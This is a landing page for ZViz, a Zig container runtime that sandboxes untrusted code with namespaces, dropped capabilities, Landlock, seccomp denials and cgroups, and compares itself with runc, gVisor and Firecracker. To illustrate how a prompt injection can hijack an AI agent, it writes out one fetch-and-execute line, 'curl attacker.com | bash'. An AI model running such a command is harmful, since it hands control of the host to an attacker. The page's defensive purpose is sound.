OCI runtime · Zig · Linux 5.13+

Container isolation for code you can't trust but have to run.

ZViz is an OCI-compatible Zig container runtime that takes a selective-denial approach. 132 syscalls reach the host kernel at native speed, 24 dangerous ones are denied at seccomp, and one — socket — is argument-filtered inline. No userspace kernel. No daemon.

git clone · zig build How it works vs gVisor →

● 41/41 capabilities dropped ● 5 namespaces per container ● single static binary ● Apache 2.0

~/zviz-bundle

$ zviz run hostile-tenant ~/bundle --verbose
[init] namespaces ............. user pid mount ipc uts
[init] capabilities ........... 41 dropped
[init] landlock ............... ruleset applied
[init] seccomp ................ BPF filter loaded
[init] cgroups v2 ............. mem + pids capped
[ready] PID 1

read(0, ...)                 ALLOW
write(1, ...)                ALLOW
clock_gettime(...)           ALLOW
socket(AF_PACKET, ...)       DENY  EPERM
ptrace(...)                  DENY  EPERM
mount(...)                   DENY  EPERM
init_module(...)             DENY  EPERM
socket(AF_INET, SOCK_STREAM) argument-filtered ok

Illustrative --verbose output — not a recorded session.

What is ZViz?

ZViz is an OCI-compatible container runtime written in Zig. It runs standard OCI bundles like runc does, but wraps the workload in a layered enforcement stack and a selective-denial syscall policy: dangerous syscalls are refused at the kernel boundary, everything else runs at native speed. It is a single static binary — no daemon, no userspace kernel.

Deny, don't emulate

Unlike a userspace kernel, ZViz doesn't reimplement the syscall ABI. Allowed syscalls hit the host kernel directly; the 24 dangerous ones simply return EPERM.

Layered by default

Five namespaces, all 41 Linux capabilities dropped, a Landlock ruleset, a seccomp-BPF filter, and cgroups v2 limits — applied in a fixed, load-bearing order.

Hostile-workload threat model

Built for the case where the code inside the container is the adversary — AI agents, code-execution platforms, CI sandboxes, and multi-tenant user code.

132

syscalls allowed at native speed

syscalls denied at seccomp

Linux capabilities dropped

Apache 2.0

open source license

Verifiable facts from the ZViz README — not benchmark claims.

You're running code you didn't write

There are three common answers to "runc is not a security boundary." ZViz picks a fourth: shrink the reachable syscall surface, keep native speed.

Plain containers expose the whole kernel

The problem

runc gives you namespaces and cgroups, but the full syscall surface is still reachable. Every runc-escape CVE is a reminder that "containerized" is not a security boundary.

ZViz's approach

ZViz drops all 41 capabilities, applies a Landlock ruleset, and loads a seccomp filter that denies the dangerous syscalls outright — a much smaller reachable surface.

ZViz vs runc →

Userspace kernels pay an emulation tax

The problem

gVisor reimplements the syscall ABI in a userspace process. That buys compatibility but routes every syscall through an extra layer, and cold starts are heavier.

ZViz's approach

ZViz does not emulate. Allowed syscalls execute on the host kernel at native speed; only the refused ones cost anything, and that cost is a rejection.

ZViz vs gVisor →

VMs are strong but heavy

The problem

A MicroVM boots a guest kernel with virtio devices. Excellent isolation, but you carry a KVM guest, a boot path, and per-instance memory overhead.

ZViz's approach

ZViz runs on bare Linux kernel primitives — no KVM guest, no virtio. You get a hardened boundary without the VM footprint, for workloads a strict syscall policy can contain.

ZViz vs Firecracker →

Untrusted code is the default now

The problem

AI agents run LLM-generated code. Code-execution platforms run user snippets. One prompt injection can be curl attacker.com | bash.

ZViz's approach

With selective denial, the exploit fails at the kernel boundary. Fresh namespaces, zero capabilities, Landlock, and a default-deny network posture per container.

AI agent code execution →

Architecture

Five enforcement layers, applied in order

Ordering is load-bearing. Capabilities drop before seccomp loads. Landlock applies before seccomp so its own setup syscalls aren't self-blocked. cgroups come last, once the process boundary exists.

Namespaces

user, pid, mount, ipc, uts — resource isolation per container

Capabilities

all 41 Linux capabilities dropped — no CAP_SYS_* at all

Landlock LSM

unprivileged, kernel-enforced filesystem access control

Seccomp-BPF

selective denial: ALLOW (132) / DENY (24) / argument-filter (1)

cgroups v2

memory, PID and CPU limits — fork bombs stay contained

runc

App → Kernel. Namespaces + cgroups only; the full syscall surface is reachable.

gVisor

App → Sentry userspace kernel (emulates the ABI) → a small host-syscall set.

ZViz

App → BPF filter → ALLOW (132, native) / DENY (24) / filter (1).

Point it at an OCI bundle

Build once, run any standard rootfs — including one produced by docker export. The policy is small enough to read in a glance.

Build & run

# Build the static binary (Zig 0.15.0+)
$ zig build -Doptimize=ReleaseSafe

# Grab any image as an OCI rootfs
$ docker create --name x redis:alpine
$ docker export x | tar -C bundle/rootfs -xf -

# Run it under the hostile-tenant policy
$ zviz run app ./bundle --profile hostile-tenant
[ready] PID 1

The policy at a glance

# Selective-denial policy, in one glance
allow  = 132 syscalls   # run on the host kernel, native speed
deny   = 24 syscalls    # return EPERM at the seccomp boundary
filter = 1 syscall      # socket(): inspected inline, per family

# denied examples
ptrace  mount  unshare  init_module  kexec_load

Requires Linux 5.13+ (Landlock) and cgroups v2. See the quickstart for the full walkthrough.

Built to contain a hostile workload

Every feature exists to shrink the reachable kernel surface or keep the allowed path fast. Nothing here is a benchmark claim — these are the mechanisms.

Isolation layers

The layered enforcement stack that contains a hostile workload

Five namespaces

A fresh user, pid, mount, ipc, and uts namespace per container. The kernel boundary is the actual isolation boundary, not a convention.

Learn more →

All 41 capabilities dropped

Every Linux capability is cleared before the workload runs — no CAP_SYS_ADMIN, no CAP_NET_RAW, nothing. Capabilities drop before seccomp loads.

Learn more →

Landlock LSM ruleset

Unprivileged, kernel-enforced filesystem access control. Applied before seccomp so its own setup syscalls are not self-blocked. Requires Linux 5.13+.

Learn more →

cgroups v2 limits

Memory, PID, and CPU limits per container. Fork bombs stay contained. Applied last, once the process boundary is established.

Learn more →

Selective-denial policy

Deny the dangerous syscalls, run the rest at native speed

Seccomp-BPF selective denial

132 syscalls reach the host kernel at native speed, 24 dangerous ones are denied at the BPF filter, and one (socket) is argument-filtered inline. Deny, do not emulate.

Learn more →

Native syscall speed

Allowed syscalls execute directly on the host kernel — ZViz does not emulate them the way a userspace kernel does. There is no per-syscall translation tax.

Learn more →

Argument-filtered socket

The socket syscall is inspected inline rather than blanket-denied, so policies can permit specific socket families while refusing the dangerous ones.

Learn more →

Runtime shape

OCI-compatible, single static binary, no daemon

OCI-compatible

Runs standard OCI bundles — including rootfs produced by docker export. No bespoke image format. Point ZViz at a config.json and a rootfs directory.

Learn more →

Single static binary

One statically-linked Zig binary. No daemon, no supervisor process, no userspace kernel. zviz run exec-replaces into PID 1.

Learn more →

Honest about what it is — and isn't

ZViz is one specific bet. Here's the shape of it, and where another tool is the right call.

What ZViz is

An OCI-compatible container runtime written in Zig
A selective-denial syscall policy: 132 allow / 24 deny / 1 filter
A layered stack: namespaces, 41 caps dropped, Landlock, seccomp, cgroups v2
A single static binary — no daemon, no supervisor

What ZViz is not

Not a userspace kernel like gVisor

Allowed syscalls run on the host kernel natively; ZViz does not emulate the ABI.
Not a MicroVM like Firecracker

There is no KVM guest, no virtio devices, no boot path — bare kernel primitives.
Not a drop-in runc replacement for every workload

If you need ptrace, mount, or unshare inside the container, use gVisor instead.

Read the full threat model →

Explore the docs

Everything about ZViz — the enforcement mechanisms, where it fits, how it compares, and how to run it.

Run untrusted code with a smaller attack surface

ZViz is open source under Apache 2.0. Build the static binary, point it at any OCI bundle, and pick a profile — or write your own selective-denial policy.

View on GitHub Read the quickstart

Container isolation for code you can't trust but have to run.

What is ZViz?

You're running code you didn't write

Plain containers expose the whole kernel

Userspace kernels pay an emulation tax

VMs are strong but heavy

Untrusted code is the default now

Five enforcement layers, applied in order

Namespaces

Capabilities

Landlock LSM

Seccomp-BPF

cgroups v2

Point it at an OCI bundle

Built to contain a hostile workload

Isolation layers

Five namespaces

All 41 capabilities dropped

Landlock LSM ruleset

cgroups v2 limits

Selective-denial policy

Seccomp-BPF selective denial

Native syscall speed

Argument-filtered socket

Runtime shape

OCI-compatible

Single static binary

Honest about what it is — and isn't

What ZViz is

What ZViz is not

Explore the docs

Features

How it works

Threat model

Use cases

Guides

Comparisons

Quickstart

Field notes

FAQ

Glossary

About

Run untrusted code with a smaller attack surface